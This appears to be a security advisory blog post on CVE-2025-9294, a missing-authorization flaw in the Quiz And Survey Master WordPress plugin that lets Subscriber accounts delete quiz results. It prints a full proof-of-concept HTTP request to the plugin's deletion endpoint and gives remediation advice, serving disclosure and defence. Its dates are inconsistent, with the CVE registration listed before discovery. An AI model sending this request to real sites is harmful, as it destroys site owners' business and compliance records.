CVE-2025-9294 affects Quiz And Survey Master QSM and it is a missing authorization vulnerability that allows a low privilege authenticated user to delete quiz results they should never be able to touch. The issue is not about guessing passwords or bypassing login. It is about a server side action that performs a destructive change while trusting that a generic nonce equals permission. On real sites QSM results are often business data. They can represent leads, assessments, training completions, exam attempts, customer feedback, or any workflow where results are used for decisions and reporting. Because the plugin is widely deployed at around 50k plus installs, the scenario of a site with many Subscriber accounts is common, which makes this a realistic integrity and availability problem rather than a purely theoretical one.
| CVE | CVE-2025-9294 |
| Plugin Version | Quiz And Survey Master <= 10.3.1 |
| All Time | 3 108 304 |
| Active installations | 50 000+ |
| Publicly Published | January 5, 2025 |
| Last Updated | January 5, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9294 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-master-next/quiz-and-survey-master-1031-missing-authorization-to-authenticated-subscriber-quiz-results-deletion |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| August 13, 2025 | Plugin testing and vulnerability detection in the QSM have been completed |
| August 13, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| January 5, 2025 | Registered CVE-2025-9294 |
Discovery of the Vulnerability
The vulnerable surface is an AJAX endpoint reachable through wp admin admin-ajax. A request with action qsm_dashboard_delete_result and a chosen result_id is sufficient to mark results as deleted when paired with a nonce obtained in an authenticated context. The core flaw is that the handler does not enforce a capability check such as current_user_can against an administrative capability that should be required for managing results. Instead it relies on a nonce, and that nonce is not an authorization mechanism, it is only intended to prove request intent for someone who is already authorized. When capability validation is missing, any user who can obtain the nonce can perform the destructive operation, which creates a direct privilege boundary bypass for result management.
Understanding of IDOR attack’s
verify the user is authorized for that action by checking capabilities and sometimes ownership or object level rules. Second the server should verify request authenticity using a nonce to prevent CSRF and accidental submission. CVE-2025-9294 breaks the first layer, which is the more important one. This is a common plugin mistake where developers treat nonces as security tokens. In reality a nonce can be exposed to roles that can load admin screens, through localized scripts, or through UI elements, and once a low privilege user has it they can call endpoints directly. Real world damage here is not only about losing historical quiz results. It can break compliance audits, destroy training evidence, erase customer survey history, or wipe lead generation trails. Because results are often the only record of a user completing a quiz, deletion becomes a form of business data sabotage rather than a cosmetic website issue
Exploiting the CSRF Vulnerability
To exploit CVE-2025-9294, an attacker with Subscriber+ cookies:
POC:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/ DNT: 1 Sec-GPC: 1 Connection: keep-alive Cookie: Cookie_of_Subscriber Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u=0, i Content-Type: application/x-www-form-urlencoded Content-Length: 63 action=qsm_dashboard_delete_result&result_id={number_from__to_99999}&nonce=nonce_from_profile.php____
The direct impact is integrity loss. Deleted results mean analytics and reporting become unreliable, and it becomes difficult to prove what happened, especially if the plugin uses soft deletion flags rather than hard deletes. A malicious user can selectively delete only their own failed attempts, or they can delete a competitors results in a training system, or they can delete survey feedback that reflects badly on a product. On sites where QSM is used for exams or certifications, attackers can erase evidence trails and create disputes that are expensive to resolve. There is also a denial of service angle because repeated deletions can keep the results view empty and disrupt normal operations for staff. The low privilege requirement matters because Subscriber accounts can be created at scale through registration, meaning the attacker does not need any special access. This is why the most serious outcome is that a simple registered account can become a tool for continuous data destruction against a core business feature.
Recommendations for Improved Security
The fix is to enforce proper authorization before any deletion occurs. The handler for qsm_dashboard_delete_result should require a strict capability such as manage_options or a plugin specific capability that is granted only to trusted administrative roles, and it should validate that the current user is allowed to delete results in general and optionally restrict deletion to results they own if the feature intends that. The nonce should still be validated, but only as an additional CSRF protection layer after capability checks pass. It is also important to validate result_id as an integer and confirm the result exists before performing mutation, and to log the actor user ID along with the result_id for auditability so administrators can detect suspicious deletion patterns. As an operational mitigation, site owners should reduce who can access QSM admin dashboards, disable unnecessary registration flows, and monitor admin-ajax requests for repeated qsm_dashboard_delete_result actions so that abnormal bulk deletion attempts can be detected quickly.
By taking proactive measures to address IDOR like CVE-2025-9294 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #IDOR #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.